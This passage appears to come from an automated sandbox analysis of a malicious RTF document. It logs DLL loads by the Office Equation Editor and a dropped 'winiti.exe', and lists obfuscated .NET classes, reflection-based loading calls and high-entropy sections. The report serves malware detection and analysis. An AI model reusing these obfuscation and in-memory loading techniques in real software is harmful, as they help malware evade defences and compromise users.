                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: YjYoFznWQI.LNK.0.drLNK file: ..\..\..\..\..\Desktop\YjYoFznWQI.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: jqAx.pdbSHA256c source: winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: jqAx.pdb source: winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.411240507.00000000009A0000.00000040.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 5.2.winiti.exe.21938ac.3.raw.unpack, JwlrlmCCKvmG8rWaC9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 5.2.winiti.exe.460000.1.raw.unpack, JwlrlmCCKvmG8rWaC9.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W9IPWAqr0MPYr1VvVo.cs.Net Code: J6bocaUKN3 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W9IPWAqr0MPYr1VvVo.cs.Net Code: J6bocaUKN3 System.Reflection.Assembly.Load(byte[])
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, W9IPWAqr0MPYr1VvVo.cs.Net Code: J6bocaUKN3 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068C264 pushad ; retn 0068h2_2_0068C289
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069337E push eax; ret 2_2_0069337F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069334C push eax; ret 2_2_0069334F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00693346 push eax; ret 2_2_00693347
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0068E45E pushad ; iretd 2_2_0068E48A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069372B push eax; ret 2_2_0069372F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069553A push edx; ret 2_2_0069553B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069333E push eax; ret 2_2_0069333F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00694230 push eax; ret 2_2_0069424F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00693735 push eax; ret 2_2_00693737
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00693D02 push edx; ret 2_2_00693D03
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00693CFA push edx; ret 2_2_00693CFB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006801F4 push eax; retf 2_2_006801F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0069338E push eax; ret 2_2_0069338F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00693386 push eax; ret 2_2_00693387
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00695899 push edx; ret 2_2_0069589B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00695891 push edx; ret 2_2_00695893
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004231B6 push ebp; retf 9_2_004231B7
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004114D2 push es; retf 9_2_004114D3
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00403490 push eax; ret 9_2_00403492
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00408493 push ds; retf 9_2_00408494
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041856B pushad ; retf 9_2_004185C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041852C pushad ; retf 9_2_004185C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041858A pushad ; retf 9_2_004185C8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E6AE push esp; iretd 9_2_0041E6B1
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041876B push edi; iretd 9_2_0041877C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418773 push edi; iretd 9_2_0041877C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041871D push ebx; ret 9_2_0041871F
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009BDFA1 push ecx; ret 9_2_009BDFB4
                Source: winiti[1].exe.2.drStatic PE information: section name: .text entropy: 7.9671901350840715
                Source: winiti.exe.2.drStatic PE information: section name: .text entropy: 7.9671901350840715
                Source: 5.2.winiti.exe.21938ac.3.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, CHlsnFvlEuncWReGJN.csHigh entropy of concatenated method names: 'CVc3awEPJ4', 'qwe367xQE5', 'osh3jJvIvQ', 'KNb3AIsT1t', 'JdC3gWp5qr', 'hT53rcyh64', 'r3lkva1Cv2tVjLXtYs', 'AgLGulVq7Y3b4oTBow', 'yEp33E5yyH', 'wBP3eZwaY0'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, BHMimqiOshVfXrPhSg.csHigh entropy of concatenated method names: 'mxNaZf9cRi', 'mg4a2RPUwG', 'Pbkackc0qU', 'IRFa8qRsfD', 'nlUa9Fl1R1', 'KuSaWcJpPH', 'l7xaSPsIXO', 'WDGaDc55iB', 'L9Ua1JGhuj', 'mVYaOdsviC'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, DNvTqDGmNxtIgohYcw.csHigh entropy of concatenated method names: 'oQQc0FQ4i', 'BDU8PkAch', 'rkqWOLNkq', 'UmlSiRSE5', 'Ybr142J9O', 'eMBOVFKcY', 'ygo0KGNW2y8Td7NcKn', 'WoRTMJbUEOcomR4pas', 'tyJponITf', 'vAkUiZtEu'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, lauX2PRRT693RMSPdvu.csHigh entropy of concatenated method names: 'ToString', 'DlYUe2opvc', 'CV4Uo35JXG', 'mHsUkQLx13', 'QIHUVxqF0H', 'dLnUXtZwWo', 'zCXUsvJO8B', 'bD4UuudYvN', 'zrbGeIv0GGBx746fpX1', 'awMFmjv5orduFZSM9QG'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, fLc7GNRGXk42bWVPTdA.csHigh entropy of concatenated method names: 'SMnUZyqKit', 'mfIU2GHuaK', 'RKiUc8qvvC', 'QYycJLvX2wHgQqIQYE6', 'MwyCMpv1EVAP1kbcIwQ', 'LWMB7FvVMdBDpOmMYAE', 'bcgXBtvImrVYuDijkcy', 'rXAxRove9Ax9tCA9jes', 'OmmrbYvu3QWwoxyKhfK'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, VgRoFg73KgTDHHCmuI.csHigh entropy of concatenated method names: 'QhHhNZxUe0', 'liwhGUVpbf', 'csapYg01Py', 'fQHp3vqhRn', 'ihbh0XiW27', 'aUJhxKf7tq', 'PsthbkctA1', 'pJIhC5PAqm', 'HPdh49Evdc', 'jGVhdE2OBs'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, dkykbkR9rQvNG3XZmIP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H4xUCnf6Ip', 'QTSU4qqvwL', 'KdrUdcQ1Uf', 'J0aUR5pqOD', 'yGSUtxSiVW', 'hh5UMOGw1s', 'XRgUHHhleZ'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W4Drl4TO37y97JWKtA.csHigh entropy of concatenated method names: 'Dispose', 'IoK35TohUO', 'dpjJLlOJ9L', 'kQRKKgqWcH', 'gHF3GF3xSa', 'raU3zpcFtC', 'ProcessDialogKey', 'XERJYWowes', 'DpjJ35479m', 'Y3RJJQXD9y'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, GXYba2YoMQG9XKKBvl.csHigh entropy of concatenated method names: 'ubhs8yexla', 'FJGsWAcVyA', 'xnnsD82CGA', 'MjWs1jMqoD', 'NK7sguDqbQ', 'QHisrp9d4N', 'fgnshtkjEl', 'NxpspaEamv', 'm52slv2U4T', 'SbEsURbKbR'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, rHxnfv6Sf3LHXLbEDN.csHigh entropy of concatenated method names: 'aZ3gfA2H4y', 'VKEgxirfWt', 'X0ZgCX1bvr', 'zT3g4hwbaM', 'eQigLZGBoy', 'JbjgwJarVa', 'CpCgBlaC7Q', 'nYUgQg5SNc', 'u1ygINVLGh', 'RltgyRc9sr'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, Eil6R8trbmXLNBHNuy.csHigh entropy of concatenated method names: 'mdcxj9UD4ZfGMsOqg4u', 'ML04rsUtbCB8poGaqhm', 'riAPpKVKfA', 'lKGPlQqeOQ', 'HkwPUY2JFn', 'VuIkxIUG0kx9T58IVDd', 'kFedhRUPXY0is8rO78b'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, Iyof3xLt5ZRIW115jV.csHigh entropy of concatenated method names: 'kdvpV4B7hw', 'OOVpXnRvPT', 'n9cpsAqFpC', 'jBmpu0lT2h', 'POQpPXiGii', 'xQppaM7Y94', 'RrTp631cLq', 'YW7pndJMuP', 't2lpjgmutN', 'tlEpAJcQFJ'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, ypaX1MoG8LqZAomX1h.csHigh entropy of concatenated method names: 'iUsmD0Wbv1', 'Gy6m1CbjAB', 'bB5mFu1XcP', 'O02mLfIvrT', 'dmZmBhckm6', 'UghmQocMCc', 'tfImyLe2cb', 'UlbmvKWonI', 'RoSmfsucrk', 'veWm0nNgKB'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, KTv2InajnNoxY4E9Rd.csHigh entropy of concatenated method names: 'RTAhjP8qxY', 'DJLhAd1soQ', 'ToString', 'EmshVltPQM', 'M9ihXvN6Aj', 'arohs2yJBr', 'GCLhu8PtuH', 'MKBhPbEZVy', 'v1vha07xgC', 'W8mh6Lmjm2'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, nVct438kgTuAYGVuDt.csHigh entropy of concatenated method names: 'dsyXCJ0UkE', 'vibX4Bafga', 'TJhXdPevij', 'L10XR0cLol', 'GZVXtyLeOy', 'sfZXMPY3Yx', 'Q56XHvxXKK', 'ko9XNVxS0m', 'nkiX5hNRS2', 'RVtXGJCWKH'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, msCl8PRUvFWMD9tfMcE.csHigh entropy of concatenated method names: 'WRRlZWrtak', 'JZ4l2ZBqcr', 'GjClcT3TwS', 'VAjl8Lxskp', 'AIXl953Na7', 'kkPlWvTvbU', 'vqclSXhtIP', 'WqWlDw97hZ', 'uShl13g10D', 'hOLlOkHiR0'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, zxyfQhlGRkA29DlFf0.csHigh entropy of concatenated method names: 'cs9l3g4YWl', 'GmpleImVL0', 'nb3lo5h3p2', 'N4ulVRw5iJ', 'L8ylX4yt1r', 'qg6luxFV2M', 'qAblP9sDLO', 'VZYpHNg4nF', 'seLpNegVPF', 'asRp51FiNB'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, W9IPWAqr0MPYr1VvVo.csHigh entropy of concatenated method names: 'ob7ekgbvlw', 'S6beVLwqgn', 'BL8eXVgohH', 'mS4esF7ESR', 'zKReum5ndl', 'GuKePYyPtM', 'sYCea3vm2x', 'CNLe6U93Gd', 'jPUen8uyCf', 'GFhejiyNcM'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, HKRKTgmgtv8UpWFG4L.csHigh entropy of concatenated method names: 'VqRaVuy3I3', 'nuCasepv50', 'C4SaPusZJx', 'ic7PGZ1NOF', 'FIGPzE4K6K', 'T1IaYJD7cQ', 'chNa3wR8ZF', 'SfSaJKrTBw', 'L75ae2JsZC', 'HnBaoqWiOw'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, gpIaQEFaQE9fYaXf6e.csHigh entropy of concatenated method names: 'wQOPk9kstW', 'BZlPXNs14N', 'fVwPuR8M5b', 'FhWPapVJ0D', 'snnP6g7eSw', 'xkvutMNLZ8', 'KGOuM2v4gP', 'DxLuH4OqDX', 'QjyuN5KtUJ', 'eI8u5Fdfj7'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, IFh7DVzobfxWABMarZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jD9lmmbE46', 'YcolgyxY57', 'rnSlrwoFRU', 'qRNlheZBqp', 'S1NlpSP1iM', 'ARllleQd8r', 'GQflUXAlUv'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, VqE1uksyKtqyCUTeoW.csHigh entropy of concatenated method names: 'OZepFNKa63', 'wM9pLVmaRq', 'fRLpwEcMtB', 'sxIpBk5vyi', 'f0gpCjXGM4', 'EEDpQvW3EV', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.winiti.exe.5020000.6.raw.unpack, iywWJ6hAJcl2siLDcZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pkVJ5i3Vb1', 'bZrJGW8hEF', 'Wl3Jz0MIQO', 'AaFeYwq38k', 'znYe3pEYhj', 'eKCeJ7R9JI', 'yXxeebd3Nu', 'yq7FgWHUgUkJkmYGC5X'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, CHlsnFvlEuncWReGJN.csHigh entropy of concatenated method names: 'CVc3awEPJ4', 'qwe367xQE5', 'osh3jJvIvQ', 'KNb3AIsT1t', 'JdC3gWp5qr', 'hT53rcyh64', 'r3lkva1Cv2tVjLXtYs', 'AgLGulVq7Y3b4oTBow', 'yEp33E5yyH', 'wBP3eZwaY0'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, BHMimqiOshVfXrPhSg.csHigh entropy of concatenated method names: 'mxNaZf9cRi', 'mg4a2RPUwG', 'Pbkackc0qU', 'IRFa8qRsfD', 'nlUa9Fl1R1', 'KuSaWcJpPH', 'l7xaSPsIXO', 'WDGaDc55iB', 'L9Ua1JGhuj', 'mVYaOdsviC'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, DNvTqDGmNxtIgohYcw.csHigh entropy of concatenated method names: 'oQQc0FQ4i', 'BDU8PkAch', 'rkqWOLNkq', 'UmlSiRSE5', 'Ybr142J9O', 'eMBOVFKcY', 'ygo0KGNW2y8Td7NcKn', 'WoRTMJbUEOcomR4pas', 'tyJponITf', 'vAkUiZtEu'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, lauX2PRRT693RMSPdvu.csHigh entropy of concatenated method names: 'ToString', 'DlYUe2opvc', 'CV4Uo35JXG', 'mHsUkQLx13', 'QIHUVxqF0H', 'dLnUXtZwWo', 'zCXUsvJO8B', 'bD4UuudYvN', 'zrbGeIv0GGBx746fpX1', 'awMFmjv5orduFZSM9QG'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, fLc7GNRGXk42bWVPTdA.csHigh entropy of concatenated method names: 'SMnUZyqKit', 'mfIU2GHuaK', 'RKiUc8qvvC', 'QYycJLvX2wHgQqIQYE6', 'MwyCMpv1EVAP1kbcIwQ', 'LWMB7FvVMdBDpOmMYAE', 'bcgXBtvImrVYuDijkcy', 'rXAxRove9Ax9tCA9jes', 'OmmrbYvu3QWwoxyKhfK'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, VgRoFg73KgTDHHCmuI.csHigh entropy of concatenated method names: 'QhHhNZxUe0', 'liwhGUVpbf', 'csapYg01Py', 'fQHp3vqhRn', 'ihbh0XiW27', 'aUJhxKf7tq', 'PsthbkctA1', 'pJIhC5PAqm', 'HPdh49Evdc', 'jGVhdE2OBs'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, dkykbkR9rQvNG3XZmIP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H4xUCnf6Ip', 'QTSU4qqvwL', 'KdrUdcQ1Uf', 'J0aUR5pqOD', 'yGSUtxSiVW', 'hh5UMOGw1s', 'XRgUHHhleZ'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W4Drl4TO37y97JWKtA.csHigh entropy of concatenated method names: 'Dispose', 'IoK35TohUO', 'dpjJLlOJ9L', 'kQRKKgqWcH', 'gHF3GF3xSa', 'raU3zpcFtC', 'ProcessDialogKey', 'XERJYWowes', 'DpjJ35479m', 'Y3RJJQXD9y'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, GXYba2YoMQG9XKKBvl.csHigh entropy of concatenated method names: 'ubhs8yexla', 'FJGsWAcVyA', 'xnnsD82CGA', 'MjWs1jMqoD', 'NK7sguDqbQ', 'QHisrp9d4N', 'fgnshtkjEl', 'NxpspaEamv', 'm52slv2U4T', 'SbEsURbKbR'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, rHxnfv6Sf3LHXLbEDN.csHigh entropy of concatenated method names: 'aZ3gfA2H4y', 'VKEgxirfWt', 'X0ZgCX1bvr', 'zT3g4hwbaM', 'eQigLZGBoy', 'JbjgwJarVa', 'CpCgBlaC7Q', 'nYUgQg5SNc', 'u1ygINVLGh', 'RltgyRc9sr'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, Eil6R8trbmXLNBHNuy.csHigh entropy of concatenated method names: 'mdcxj9UD4ZfGMsOqg4u', 'ML04rsUtbCB8poGaqhm', 'riAPpKVKfA', 'lKGPlQqeOQ', 'HkwPUY2JFn', 'VuIkxIUG0kx9T58IVDd', 'kFedhRUPXY0is8rO78b'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, Iyof3xLt5ZRIW115jV.csHigh entropy of concatenated method names: 'kdvpV4B7hw', 'OOVpXnRvPT', 'n9cpsAqFpC', 'jBmpu0lT2h', 'POQpPXiGii', 'xQppaM7Y94', 'RrTp631cLq', 'YW7pndJMuP', 't2lpjgmutN', 'tlEpAJcQFJ'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, ypaX1MoG8LqZAomX1h.csHigh entropy of concatenated method names: 'iUsmD0Wbv1', 'Gy6m1CbjAB', 'bB5mFu1XcP', 'O02mLfIvrT', 'dmZmBhckm6', 'UghmQocMCc', 'tfImyLe2cb', 'UlbmvKWonI', 'RoSmfsucrk', 'veWm0nNgKB'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, KTv2InajnNoxY4E9Rd.csHigh entropy of concatenated method names: 'RTAhjP8qxY', 'DJLhAd1soQ', 'ToString', 'EmshVltPQM', 'M9ihXvN6Aj', 'arohs2yJBr', 'GCLhu8PtuH', 'MKBhPbEZVy', 'v1vha07xgC', 'W8mh6Lmjm2'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, nVct438kgTuAYGVuDt.csHigh entropy of concatenated method names: 'dsyXCJ0UkE', 'vibX4Bafga', 'TJhXdPevij', 'L10XR0cLol', 'GZVXtyLeOy', 'sfZXMPY3Yx', 'Q56XHvxXKK', 'ko9XNVxS0m', 'nkiX5hNRS2', 'RVtXGJCWKH'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, msCl8PRUvFWMD9tfMcE.csHigh entropy of concatenated method names: 'WRRlZWrtak', 'JZ4l2ZBqcr', 'GjClcT3TwS', 'VAjl8Lxskp', 'AIXl953Na7', 'kkPlWvTvbU', 'vqclSXhtIP', 'WqWlDw97hZ', 'uShl13g10D', 'hOLlOkHiR0'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, zxyfQhlGRkA29DlFf0.csHigh entropy of concatenated method names: 'cs9l3g4YWl', 'GmpleImVL0', 'nb3lo5h3p2', 'N4ulVRw5iJ', 'L8ylX4yt1r', 'qg6luxFV2M', 'qAblP9sDLO', 'VZYpHNg4nF', 'seLpNegVPF', 'asRp51FiNB'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, W9IPWAqr0MPYr1VvVo.csHigh entropy of concatenated method names: 'ob7ekgbvlw', 'S6beVLwqgn', 'BL8eXVgohH', 'mS4esF7ESR', 'zKReum5ndl', 'GuKePYyPtM', 'sYCea3vm2x', 'CNLe6U93Gd', 'jPUen8uyCf', 'GFhejiyNcM'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, HKRKTgmgtv8UpWFG4L.csHigh entropy of concatenated method names: 'VqRaVuy3I3', 'nuCasepv50', 'C4SaPusZJx', 'ic7PGZ1NOF', 'FIGPzE4K6K', 'T1IaYJD7cQ', 'chNa3wR8ZF', 'SfSaJKrTBw', 'L75ae2JsZC', 'HnBaoqWiOw'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, gpIaQEFaQE9fYaXf6e.csHigh entropy of concatenated method names: 'wQOPk9kstW', 'BZlPXNs14N', 'fVwPuR8M5b', 'FhWPapVJ0D', 'snnP6g7eSw', 'xkvutMNLZ8', 'KGOuM2v4gP', 'DxLuH4OqDX', 'QjyuN5KtUJ', 'eI8u5Fdfj7'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, IFh7DVzobfxWABMarZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jD9lmmbE46', 'YcolgyxY57', 'rnSlrwoFRU', 'qRNlheZBqp', 'S1NlpSP1iM', 'ARllleQd8r', 'GQflUXAlUv'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, VqE1uksyKtqyCUTeoW.csHigh entropy of concatenated method names: 'OZepFNKa63', 'wM9pLVmaRq', 'fRLpwEcMtB', 'sxIpBk5vyi', 'f0gpCjXGM4', 'EEDpQvW3EV', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.winiti.exe.35768e8.5.raw.unpack, iywWJ6hAJcl2siLDcZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pkVJ5i3Vb1', 'bZrJGW8hEF', 'Wl3Jz0MIQO', 'AaFeYwq38k', 'znYe3pEYhj', 'eKCeJ7R9JI', 'yXxeebd3Nu', 'yq7FgWHUgUkJkmYGC5X'
                Source: 5.2.winiti.exe.460000.1.raw.unpack, JwlrlmCCKvmG8rWaC9.csHigh entropy of concatenated method names: 'sBWW1o69QP', 'RgtTUJcyZL', 'wHRL3ZoRRm', 'qx3LWApERP', 'Eo0LL2b9ec', 'SSpLi0YFJu', 'f0gY5uTkfS8Ax', 'DIXDrUpg3', 'mwmTMKcOE', 'GXuog4qOP'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, CHlsnFvlEuncWReGJN.csHigh entropy of concatenated method names: 'CVc3awEPJ4', 'qwe367xQE5', 'osh3jJvIvQ', 'KNb3AIsT1t', 'JdC3gWp5qr', 'hT53rcyh64', 'r3lkva1Cv2tVjLXtYs', 'AgLGulVq7Y3b4oTBow', 'yEp33E5yyH', 'wBP3eZwaY0'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, BHMimqiOshVfXrPhSg.csHigh entropy of concatenated method names: 'mxNaZf9cRi', 'mg4a2RPUwG', 'Pbkackc0qU', 'IRFa8qRsfD', 'nlUa9Fl1R1', 'KuSaWcJpPH', 'l7xaSPsIXO', 'WDGaDc55iB', 'L9Ua1JGhuj', 'mVYaOdsviC'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, DNvTqDGmNxtIgohYcw.csHigh entropy of concatenated method names: 'oQQc0FQ4i', 'BDU8PkAch', 'rkqWOLNkq', 'UmlSiRSE5', 'Ybr142J9O', 'eMBOVFKcY', 'ygo0KGNW2y8Td7NcKn', 'WoRTMJbUEOcomR4pas', 'tyJponITf', 'vAkUiZtEu'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, lauX2PRRT693RMSPdvu.csHigh entropy of concatenated method names: 'ToString', 'DlYUe2opvc', 'CV4Uo35JXG', 'mHsUkQLx13', 'QIHUVxqF0H', 'dLnUXtZwWo', 'zCXUsvJO8B', 'bD4UuudYvN', 'zrbGeIv0GGBx746fpX1', 'awMFmjv5orduFZSM9QG'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, fLc7GNRGXk42bWVPTdA.csHigh entropy of concatenated method names: 'SMnUZyqKit', 'mfIU2GHuaK', 'RKiUc8qvvC', 'QYycJLvX2wHgQqIQYE6', 'MwyCMpv1EVAP1kbcIwQ', 'LWMB7FvVMdBDpOmMYAE', 'bcgXBtvImrVYuDijkcy', 'rXAxRove9Ax9tCA9jes', 'OmmrbYvu3QWwoxyKhfK'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, VgRoFg73KgTDHHCmuI.csHigh entropy of concatenated method names: 'QhHhNZxUe0', 'liwhGUVpbf', 'csapYg01Py', 'fQHp3vqhRn', 'ihbh0XiW27', 'aUJhxKf7tq', 'PsthbkctA1', 'pJIhC5PAqm', 'HPdh49Evdc', 'jGVhdE2OBs'
                Source: 5.2.winiti.exe.34ef6c8.4.raw.unpack, dkykbkR9rQvNG3XZmIP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'H4xUCnf6Ip', 'QTSU4qqvwL', 'KdrUdcQ1Uf', 'J0aUR5pqOD', 'yGSUtxSiVW', 'hh5UMOGw1s', 'XRgUHHhleZ'
